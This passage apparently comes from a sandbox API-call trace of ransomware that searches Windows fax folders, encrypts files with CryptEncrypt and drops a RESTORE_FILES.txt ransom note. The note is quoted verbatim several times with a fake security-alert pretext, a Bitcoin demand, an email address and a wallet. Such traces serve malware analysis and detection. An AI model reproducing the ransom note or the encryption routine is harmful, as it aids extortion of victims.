lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x4a9210 [0072.089] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0072.089] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0072.089] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0072.089] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0072.089] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0072.089] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\.") returned 71 [0072.089] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0072.089] FindNextFileW (in: hFindFile=0x4a9210, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0072.089] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0072.089] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0072.089] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0072.089] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0072.089] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0072.089] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\..") returned 72 [0072.089] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0072.089] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0072.089] FindNextFileW (in: hFindFile=0x4a9210, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0072.089] lstrcmpiW (lpString1="confident.cov", lpString2="Windows") returned -1 [0072.089] lstrcmpiW (lpString1="confident.cov", lpString2="Program Files") returned -1 [0072.089] lstrcmpiW (lpString1="confident.cov", lpString2="Program Files (x86)") returned -1 [0072.089] lstrcmpiW (lpString1="confident.cov", 
lpString2="$Recycle.bin") returned 1 [0072.089] lstrcmpiW (lpString1="confident.cov", lpString2="System Volume Information") returned -1 [0072.089] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\confident.cov") returned 83 [0072.089] StrStrIW (lpFirst="confident.cov", lpSrch=".protected") returned 0x0 [0072.089] lstrcmpW (lpString1="confident.cov", lpString2="RESTORE_FILES.txt") returned -1 [0072.089] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0072.090] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9250*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x4a9250*, pdwDataLen=0x295ea04*=0x30) returned 1 [0072.090] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\confident.cov" (normalized: "c:\\programdata\\microsoft\\windows nt\\msfax\\common coverpages\\en-us\\confident.cov"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0072.090] FindNextFileW (in: hFindFile=0x4a9210, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0072.090] lstrcmpiW (lpString1="fyi.cov", lpString2="Windows") returned -1 [0072.090] lstrcmpiW (lpString1="fyi.cov", lpString2="Program Files") returned -1 [0072.090] lstrcmpiW (lpString1="fyi.cov", lpString2="Program Files (x86)") returned -1 [0072.090] lstrcmpiW (lpString1="fyi.cov", lpString2="$Recycle.bin") returned 1 [0072.090] lstrcmpiW (lpString1="fyi.cov", lpString2="System Volume Information") returned -1 [0072.090] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\fyi.cov") returned 77 [0072.090] StrStrIW (lpFirst="fyi.cov", 
lpSrch=".protected") returned 0x0 [0072.090] lstrcmpW (lpString1="fyi.cov", lpString2="RESTORE_FILES.txt") returned -1 [0072.090] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0072.090] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9250*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x4a9250*, pdwDataLen=0x295ea04*=0x30) returned 1 [0072.090] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\fyi.cov" (normalized: "c:\\programdata\\microsoft\\windows nt\\msfax\\common coverpages\\en-us\\fyi.cov"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0072.091] FindNextFileW (in: hFindFile=0x4a9210, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0072.091] lstrcmpiW (lpString1="generic.cov", lpString2="Windows") returned -1 [0072.091] lstrcmpiW (lpString1="generic.cov", lpString2="Program Files") returned -1 [0072.091] lstrcmpiW (lpString1="generic.cov", lpString2="Program Files (x86)") returned -1 [0072.091] lstrcmpiW (lpString1="generic.cov", lpString2="$Recycle.bin") returned 1 [0072.091] lstrcmpiW (lpString1="generic.cov", lpString2="System Volume Information") returned -1 [0072.091] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\generic.cov") returned 81 [0072.091] StrStrIW (lpFirst="generic.cov", lpSrch=".protected") returned 0x0 [0072.091] lstrcmpW (lpString1="generic.cov", lpString2="RESTORE_FILES.txt") returned -1 [0072.091] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0072.091] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9250*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 
| out: pbData=0x4a9250*, pdwDataLen=0x295ea04*=0x30) returned 1 [0072.091] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\generic.cov" (normalized: "c:\\programdata\\microsoft\\windows nt\\msfax\\common coverpages\\en-us\\generic.cov"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0072.091] FindNextFileW (in: hFindFile=0x4a9210, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0072.091] lstrcmpiW (lpString1="urgent.cov", lpString2="Windows") returned -1 [0072.091] lstrcmpiW (lpString1="urgent.cov", lpString2="Program Files") returned 1 [0072.091] lstrcmpiW (lpString1="urgent.cov", lpString2="Program Files (x86)") returned 1 [0072.091] lstrcmpiW (lpString1="urgent.cov", lpString2="$Recycle.bin") returned 1 [0072.091] lstrcmpiW (lpString1="urgent.cov", lpString2="System Volume Information") returned 1 [0072.091] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\urgent.cov") returned 80 [0072.091] StrStrIW (lpFirst="urgent.cov", lpSrch=".protected") returned 0x0 [0072.091] lstrcmpW (lpString1="urgent.cov", lpString2="RESTORE_FILES.txt") returned 1 [0072.091] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0072.091] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9250*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x4a9250*, pdwDataLen=0x295ea04*=0x30) returned 1 [0072.091] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\urgent.cov" (normalized: "c:\\programdata\\microsoft\\windows nt\\msfax\\common coverpages\\en-us\\urgent.cov"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0072.091] FindNextFileW (in: hFindFile=0x4a9210, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0072.091] FindClose (in: hFindFile=0x4a9210 | out: hFindFile=0x4a9210) returned 1 [0072.091] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\RESTORE_FILES.txt") returned 87 [0072.092] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\windows nt\\msfax\\common coverpages\\en-us\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0072.092] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0072.092] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0072.092] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0072.093] WriteFile (in: hFile=0xd8, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0072.093] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0072.093] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0072.093] CloseHandle (hObject=0xd8) returned 1 [0072.093] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0072.093] FindClose (in: hFindFile=0x447cc0 | out: hFindFile=0x447cc0) returned 1 [0072.093] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\RESTORE_FILES.txt") returned 81 [0072.093] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\windows nt\\msfax\\common coverpages\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0072.094] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0072.094] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0072.094] lstrlenA (lpString="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") returned 684 [0072.094] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0072.094] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0072.094] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, 
lpOverlapped=0x0) returned 1 [0072.094] CloseHandle (hObject=0xd4) returned 1 [0072.111] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0072.111] lstrcmpiW (lpString1="Inbox", lpString2="Windows") returned -1 [0072.111] lstrcmpiW (lpString1="Inbox", lpString2="Program Files") returned -1 [0072.111] lstrcmpiW (lpString1="Inbox", lpString2="Program Files (x86)") returned -1 [0072.111] lstrcmpiW (lpString1="Inbox", lpString2="$Recycle.bin") returned 1 [0072.111] lstrcmpiW (lpString1="Inbox", lpString2="System Volume Information") returned -1 [0072.111] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Inbox") returned 51 [0072.111] lstrcmpW (lpString1="Inbox", lpString2=".") returned 1 [0072.111] lstrcmpW (lpString1="Inbox", lpString2="..") returned 1 [0072.111] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Inbox\\*") returned 53 [0072.111] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Inbox\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x447cc0 [0072.112] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0072.112] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0072.112] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0072.112] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0072.112] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0072.112] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Inbox\\.") returned 53 [0072.112] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0072.112] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 
[0072.112] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0072.112] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0072.112] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0072.112] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0072.112] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0072.112] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Inbox\\..") returned 54 [0072.112] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0072.112] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0072.112] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0072.112] FindClose (in: hFindFile=0x447cc0 | out: hFindFile=0x447cc0) returned 1 [0072.113] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Inbox\\RESTORE_FILES.txt") returned 69 [0072.113] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Inbox\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\windows nt\\msfax\\inbox\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0072.113] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0072.113] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0072.114] lstrlenA (lpString="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") returned 684 [0072.114] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0072.114] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0072.114] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, 
lpOverlapped=0x0) returned 1 [0072.114] CloseHandle (hObject=0xd4) returned 1 [0072.114] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0072.114] lstrcmpiW (lpString1="Queue", lpString2="Windows") returned -1 [0072.114] lstrcmpiW (lpString1="Queue", lpString2="Program Files") returned 1 [0072.114] lstrcmpiW (lpString1="Queue", lpString2="Program Files (x86)") returned 1 [0072.114] lstrcmpiW (lpString1="Queue", lpString2="$Recycle.bin") returned 1 [0072.114] lstrcmpiW (lpString1="Queue", lpString2="System Volume Information") returned -1 [0072.114] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Queue") returned 51 [0072.114] lstrcmpW (lpString1="Queue", lpString2=".") returned 1 [0072.114] lstrcmpW (lpString1="Queue", lpString2="..") returned 1 [0072.114] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Queue\\*") returned 53 [0072.114] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Queue\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x447cc0 [0072.114] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0072.114] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0072.114] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0072.114] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0072.114] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0072.114] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Queue\\.") returned 53 [0072.114] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0072.114] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 
[0072.115] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0072.115] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0072.115] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0072.115] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0072.115] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0072.115] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Queue\\..") returned 54 [0072.115] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0072.115] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0072.115] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0072.115] FindClose (in: hFindFile=0x447cc0 | out: hFindFile=0x447cc0) returned 1 [0072.115] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Queue\\RESTORE_FILES.txt") returned 69 [0072.115] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Queue\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\windows nt\\msfax\\queue\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0072.115] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0072.115] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0072.116] lstrlenA 